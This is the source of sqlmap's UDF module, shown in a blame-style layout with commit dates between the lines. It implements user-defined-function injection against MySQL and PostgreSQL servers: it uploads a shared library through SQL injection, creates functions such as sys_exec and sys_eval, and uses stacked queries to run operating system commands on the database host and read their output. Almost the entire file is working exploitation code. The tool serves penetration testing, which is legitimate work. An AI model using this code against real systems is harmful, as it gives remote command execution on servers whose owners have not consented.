2009-04-22 15:48:07 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2012-07-12 21:38:03 +04:00
|
|
|
Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2009-04-22 15:48:07 +04:00
|
|
|
"""
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
import os
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
2010-10-21 02:09:03 +04:00
|
|
|
from lib.core.common import dataToStdout
|
2011-01-28 19:36:09 +03:00
|
|
|
from lib.core.common import Backend
|
2010-12-18 18:57:47 +03:00
|
|
|
from lib.core.common import isTechniqueAvailable
|
2009-09-26 03:03:45 +04:00
|
|
|
from lib.core.common import readInput
|
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import queries
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2012-04-04 13:25:05 +04:00
|
|
|
from lib.core.enums import CHARSET_TYPE
|
|
|
|
from lib.core.enums import EXPECTED
|
2011-04-23 20:25:09 +04:00
|
|
|
from lib.core.enums import OS
|
2010-12-18 18:57:47 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2009-09-26 03:03:45 +04:00
|
|
|
from lib.core.exception import sqlmapFilePathException
|
|
|
|
from lib.core.exception import sqlmapMissingMandatoryOptionException
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.exception import sqlmapUnsupportedFeatureException
|
2010-09-30 23:49:14 +04:00
|
|
|
from lib.core.exception import sqlmapUserQuitException
|
2010-02-12 01:57:50 +03:00
|
|
|
from lib.core.unescaper import unescaper
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.request import inject
|
|
|
|
|
|
|
|
class UDF:
|
|
|
|
"""
|
|
|
|
This class defines methods to deal with User-Defined Functions for
|
|
|
|
plugins.
|
|
|
|
"""
|
|
|
|
|
|
|
|
def __init__(self):
|
2011-04-30 17:20:05 +04:00
|
|
|
self.createdUdf = set()
|
|
|
|
self.udfs = {}
|
2009-04-22 15:48:07 +04:00
|
|
|
self.udfToCreate = set()
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def __askOverwriteUdf(self, udf):
|
2011-04-30 17:20:05 +04:00
|
|
|
message = "UDF '%s' already exists, do you " % udf
|
2010-01-02 05:02:12 +03:00
|
|
|
message += "want to overwrite it? [y/N] "
|
2011-04-30 17:20:05 +04:00
|
|
|
output = readInput(message, default="N")
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
if output and output[0] in ("y", "Y"):
|
|
|
|
return True
|
|
|
|
else:
|
|
|
|
return False
|
|
|
|
|
|
|
|
def __checkExistUdf(self, udf):
|
2010-01-02 05:02:12 +03:00
|
|
|
logger.info("checking if UDF '%s' already exist" % udf)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2011-02-21 19:00:56 +03:00
|
|
|
query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
|
2012-07-11 13:58:47 +04:00
|
|
|
return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
def udfCheckAndOverwrite(self, udf):
|
2011-04-30 17:20:05 +04:00
|
|
|
exists = self.__checkExistUdf(udf)
|
2009-09-26 03:03:45 +04:00
|
|
|
overwrite = True
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if exists:
|
2009-09-26 03:03:45 +04:00
|
|
|
overwrite = self.__askOverwriteUdf(udf)
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if overwrite:
|
2009-09-26 03:03:45 +04:00
|
|
|
self.udfToCreate.add(udf)
|
|
|
|
|
|
|
|
def udfCreateSupportTbl(self, dataType):
|
2010-03-10 01:14:26 +03:00
|
|
|
debugMsg = "creating a support table for user-defined functions"
|
2010-01-02 05:02:12 +03:00
|
|
|
logger.debug(debugMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
self.createSupportTbl(self.cmdTblName, self.tblField, dataType)
|
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
def udfForgeCmd(self, cmd):
|
|
|
|
if not cmd.startswith("'"):
|
|
|
|
cmd = "'%s" % cmd
|
|
|
|
|
|
|
|
if not cmd.endswith("'"):
|
|
|
|
cmd = "%s'" % cmd
|
|
|
|
|
|
|
|
return cmd
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def udfExecCmd(self, cmd, silent=False, udfName=None):
|
|
|
|
if udfName is None:
|
|
|
|
udfName = "sys_exec"
|
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
cmd = unescaper.unescape(self.udfForgeCmd(cmd))
|
2010-02-12 01:57:50 +03:00
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
|
|
|
|
if udfName is None:
|
|
|
|
udfName = "sys_eval"
|
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
if conf.direct:
|
|
|
|
output = self.udfExecCmd(cmd, udfName=udfName)
|
|
|
|
|
|
|
|
if output and isinstance(output, (list, tuple)):
|
|
|
|
new_output = ""
|
|
|
|
|
|
|
|
for line in output:
|
|
|
|
new_output += line.replace("\r", "\n")
|
2010-02-12 01:57:50 +03:00
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
output = new_output
|
|
|
|
else:
|
|
|
|
cmd = unescaper.unescape(self.udfForgeCmd(cmd))
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
|
|
|
|
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
|
|
|
|
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-02-07 13:24:15 +03:00
|
|
|
if output and isinstance(output, (list, tuple)):
|
2009-04-22 15:48:07 +04:00
|
|
|
output = output[0]
|
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
if output and isinstance(output, (list, tuple)):
|
|
|
|
output = output[0]
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return output
|
|
|
|
|
2010-02-12 01:57:50 +03:00
|
|
|
def udfCheckNeeded(self):
|
2011-04-30 19:24:15 +04:00
|
|
|
if ( not conf.rFile or ( conf.rFile and not Backend.isDbms(DBMS.PGSQL) ) ) and "sys_fileread" in self.sysUdfs:
|
2010-02-12 01:57:50 +03:00
|
|
|
self.sysUdfs.pop("sys_fileread")
|
|
|
|
|
2010-02-06 02:14:16 +03:00
|
|
|
if not conf.osPwn:
|
|
|
|
self.sysUdfs.pop("sys_bineval")
|
|
|
|
|
|
|
|
if not conf.osCmd and not conf.osShell and not conf.regRead:
|
|
|
|
self.sysUdfs.pop("sys_eval")
|
|
|
|
|
2010-02-12 01:57:50 +03:00
|
|
|
if not conf.osPwn and not conf.regAdd and not conf.regDel:
|
|
|
|
self.sysUdfs.pop("sys_exec")
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
def udfSetRemotePath(self):
|
|
|
|
errMsg = "udfSetRemotePath() method must be defined within the plugin"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapUnsupportedFeatureException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2010-02-12 01:57:50 +03:00
|
|
|
def udfSetLocalPaths(self):
|
|
|
|
errMsg = "udfSetLocalPaths() method must be defined within the plugin"
|
|
|
|
raise sqlmapUnsupportedFeatureException(errMsg)
|
|
|
|
|
2010-03-21 03:39:44 +03:00
|
|
|
def udfCreateFromSharedLib(self, udf=None, inpRet=None):
|
2010-02-12 02:07:33 +03:00
|
|
|
errMsg = "udfCreateFromSharedLib() method must be defined within the plugin"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapUnsupportedFeatureException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
def udfInjectCore(self, udfDict):
|
|
|
|
for udf in udfDict.keys():
|
|
|
|
if udf in self.createdUdf:
|
|
|
|
continue
|
|
|
|
|
|
|
|
self.udfCheckAndOverwrite(udf)
|
|
|
|
|
|
|
|
if len(self.udfToCreate) > 0:
|
|
|
|
self.udfSetRemotePath()
|
2012-07-02 02:25:05 +04:00
|
|
|
self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary")
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
for udf, inpRet in udfDict.items():
|
|
|
|
if udf in self.udfToCreate and udf not in self.createdUdf:
|
|
|
|
self.udfCreateFromSharedLib(udf, inpRet)
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL):
|
2009-09-26 03:03:45 +04:00
|
|
|
supportTblType = "longtext"
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.PGSQL):
|
2009-09-26 03:03:45 +04:00
|
|
|
supportTblType = "text"
|
|
|
|
|
|
|
|
self.udfCreateSupportTbl(supportTblType)
|
|
|
|
|
2010-02-12 01:57:50 +03:00
|
|
|
def udfInjectSys(self):
|
|
|
|
self.udfSetLocalPaths()
|
|
|
|
self.udfCheckNeeded()
|
|
|
|
self.udfInjectCore(self.sysUdfs)
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def udfInjectCustom(self):
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
errMsg = "UDF injection feature is not yet implemented on %s" % Backend.getIdentifiedDbms()
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapUnsupportedFeatureException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2010-12-18 18:57:47 +03:00
|
|
|
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
|
2009-09-26 03:03:45 +04:00
|
|
|
return
|
|
|
|
|
|
|
|
self.checkDbmsOs()
|
|
|
|
|
2010-03-21 03:39:44 +03:00
|
|
|
if not self.isDba():
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "the functionality requested might not work because "
|
2009-09-26 03:03:45 +04:00
|
|
|
warnMsg += "the session user is not a database administrator"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
if not conf.shLib:
|
|
|
|
msg = "which is the local path of the shared library? "
|
|
|
|
|
|
|
|
while True:
|
|
|
|
self.udfLocalFile = readInput(msg)
|
|
|
|
|
|
|
|
if self.udfLocalFile:
|
|
|
|
break
|
|
|
|
else:
|
|
|
|
logger.warn("you need to specify the local path of the shared library")
|
|
|
|
else:
|
|
|
|
self.udfLocalFile = conf.shLib
|
|
|
|
|
|
|
|
if not os.path.exists(self.udfLocalFile):
|
|
|
|
errMsg = "the specified shared library file does not exist"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapFilePathException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"):
|
|
|
|
errMsg = "shared library file must end with '.dll' or '.so'"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2011-04-23 20:25:09 +04:00
|
|
|
elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "you provided a shared object as shared library, but "
|
2009-09-26 03:03:45 +04:00
|
|
|
errMsg += "the database underlying operating system is Windows"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2011-04-23 20:25:09 +04:00
|
|
|
elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "you provided a dynamic-link library as shared library, "
|
2009-09-26 03:03:45 +04:00
|
|
|
errMsg += "but the database underlying operating system is Linux"
|
2010-01-02 05:02:12 +03:00
|
|
|
raise sqlmapMissingMandatoryOptionException(errMsg)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
|
2011-04-30 17:20:05 +04:00
|
|
|
self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "how many user-defined functions do you want to create "
|
2009-09-26 03:03:45 +04:00
|
|
|
msg += "from the shared library? "
|
|
|
|
|
|
|
|
while True:
|
|
|
|
udfCount = readInput(msg, default=1)
|
|
|
|
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(udfCount, basestring) and udfCount.isdigit():
|
2009-09-26 03:03:45 +04:00
|
|
|
udfCount = int(udfCount)
|
|
|
|
|
|
|
|
if udfCount <= 0:
|
|
|
|
logger.info("nothing to inject then")
|
|
|
|
return
|
|
|
|
else:
|
|
|
|
break
|
|
|
|
|
|
|
|
elif isinstance(udfCount, int):
|
|
|
|
break
|
|
|
|
|
|
|
|
else:
|
|
|
|
logger.warn("invalid value, only digits are allowed")
|
|
|
|
|
|
|
|
for x in range(0, udfCount):
|
|
|
|
while True:
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "what is the name of the UDF number %d? " % (x + 1)
|
2009-09-26 03:03:45 +04:00
|
|
|
udfName = readInput(msg)
|
|
|
|
|
|
|
|
if udfName:
|
|
|
|
self.udfs[udfName] = {}
|
|
|
|
break
|
|
|
|
else:
|
|
|
|
logger.warn("you need to specify the name of the UDF")
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL):
|
2009-09-26 03:03:45 +04:00
|
|
|
defaultType = "string"
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.PGSQL):
|
2009-09-26 03:03:45 +04:00
|
|
|
defaultType = "text"
|
|
|
|
|
|
|
|
self.udfs[udfName]["input"] = []
|
|
|
|
|
|
|
|
default = 1
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "how many input parameters takes UDF "
|
|
|
|
msg += "'%s'? (default: %d) " % (udfName, default)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
while True:
|
|
|
|
parCount = readInput(msg, default=default)
|
|
|
|
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0:
|
2009-09-26 03:03:45 +04:00
|
|
|
parCount = int(parCount)
|
|
|
|
break
|
|
|
|
|
|
|
|
elif isinstance(parCount, int):
|
|
|
|
break
|
|
|
|
|
|
|
|
else:
|
|
|
|
logger.warn("invalid value, only digits >= 0 are allowed")
|
|
|
|
|
|
|
|
for y in range(0, parCount):
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "what is the data-type of input parameter "
|
|
|
|
msg += "number %d? (default: %s) " % ((y + 1), defaultType)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
while True:
|
|
|
|
parType = readInput(msg, default=defaultType)
|
|
|
|
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(parType, basestring) and parType.isdigit():
|
2009-09-26 03:03:45 +04:00
|
|
|
logger.warn("you need to specify the data-type of the parameter")
|
|
|
|
|
|
|
|
else:
|
|
|
|
self.udfs[udfName]["input"].append(parType)
|
|
|
|
break
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "what is the data-type of the return "
|
2009-09-26 03:03:45 +04:00
|
|
|
msg += "value? (default: %s) " % defaultType
|
|
|
|
|
|
|
|
while True:
|
|
|
|
retType = readInput(msg, default=defaultType)
|
|
|
|
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(retType, basestring) and retType.isdigit():
|
2009-09-26 03:03:45 +04:00
|
|
|
logger.warn("you need to specify the data-type of the return value")
|
|
|
|
else:
|
|
|
|
self.udfs[udfName]["return"] = retType
|
|
|
|
break
|
|
|
|
|
|
|
|
self.udfInjectCore(self.udfs)
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "do you want to call your injected user-defined "
|
|
|
|
msg += "functions now? [Y/n/q] "
|
2009-09-26 03:03:45 +04:00
|
|
|
choice = readInput(msg, default="Y")
|
|
|
|
|
2010-09-30 23:49:14 +04:00
|
|
|
if choice[0] in ( "n", "N" ):
|
2009-09-26 03:03:45 +04:00
|
|
|
self.cleanup(udfDict=self.udfs)
|
|
|
|
return
|
2010-09-30 23:49:14 +04:00
|
|
|
elif choice[0] in ( "q", "Q" ):
|
|
|
|
self.cleanup(udfDict=self.udfs)
|
|
|
|
raise sqlmapUserQuitException
|
2009-09-26 03:03:45 +04:00
|
|
|
|
|
|
|
while True:
|
|
|
|
udfList = []
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "which UDF do you want to call?"
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2010-03-21 03:39:44 +03:00
|
|
|
for udf in self.udfs.keys():
|
2009-09-26 03:03:45 +04:00
|
|
|
udfList.append(udf)
|
|
|
|
msg += "\n[%d] %s" % (len(udfList), udf)
|
|
|
|
|
|
|
|
msg += "\n[q] Quit"
|
|
|
|
|
|
|
|
while True:
|
|
|
|
choice = readInput(msg)
|
|
|
|
|
2010-02-12 01:57:50 +03:00
|
|
|
if choice and choice[0] in ( "q", "Q" ):
|
2009-09-26 03:03:45 +04:00
|
|
|
break
|
2010-05-25 14:09:35 +04:00
|
|
|
elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList):
|
2009-09-26 03:03:45 +04:00
|
|
|
choice = int(choice)
|
|
|
|
break
|
|
|
|
elif isinstance(choice, int) and choice > 0 and choice <= len(udfList):
|
|
|
|
break
|
|
|
|
else:
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "invalid value, only digits >= 1 and "
|
2009-09-26 03:03:45 +04:00
|
|
|
warnMsg += "<= %d are allowed" % len(udfList)
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
cmd = ""
|
|
|
|
count = 1
|
2009-09-26 03:03:45 +04:00
|
|
|
udfToCall = udfList[choice - 1]
|
|
|
|
|
|
|
|
for inp in self.udfs[udfToCall]["input"]:
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "what is the value of the parameter number "
|
2009-09-26 03:03:45 +04:00
|
|
|
msg += "%d (data-type: %s)? " % (count, inp)
|
|
|
|
|
|
|
|
while True:
|
|
|
|
parValue = readInput(msg)
|
|
|
|
|
|
|
|
if parValue:
|
|
|
|
if "int" not in inp and "bool" not in inp:
|
|
|
|
parValue = "'%s'" % parValue
|
|
|
|
|
|
|
|
cmd += "%s," % parValue
|
|
|
|
|
|
|
|
break
|
|
|
|
else:
|
|
|
|
logger.warn("you need to specify the value of the parameter")
|
|
|
|
|
|
|
|
count += 1
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
cmd = cmd[:-1]
|
|
|
|
msg = "do you want to retrieve the return value of the "
|
|
|
|
msg += "UDF? [Y/n] "
|
2009-09-26 03:03:45 +04:00
|
|
|
choice = readInput(msg, default="Y")
|
|
|
|
|
|
|
|
if choice[0] in ("y", "Y"):
|
|
|
|
output = self.udfEvalCmd(cmd, udfName=udfToCall)
|
|
|
|
|
|
|
|
if output:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.string("return value", output)
|
2009-09-26 03:03:45 +04:00
|
|
|
else:
|
2010-10-21 02:09:03 +04:00
|
|
|
dataToStdout("No return value\n")
|
2009-09-26 03:03:45 +04:00
|
|
|
else:
|
|
|
|
self.udfExecCmd(cmd, udfName=udfToCall, silent=True)
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
msg = "do you want to call this or another injected UDF? [Y/n] "
|
2009-09-26 03:03:45 +04:00
|
|
|
choice = readInput(msg, default="Y")
|
|
|
|
|
|
|
|
if choice[0] not in ("y", "Y"):
|
|
|
|
break
|
|
|
|
|
|
|
|
self.cleanup(udfDict=self.udfs)
|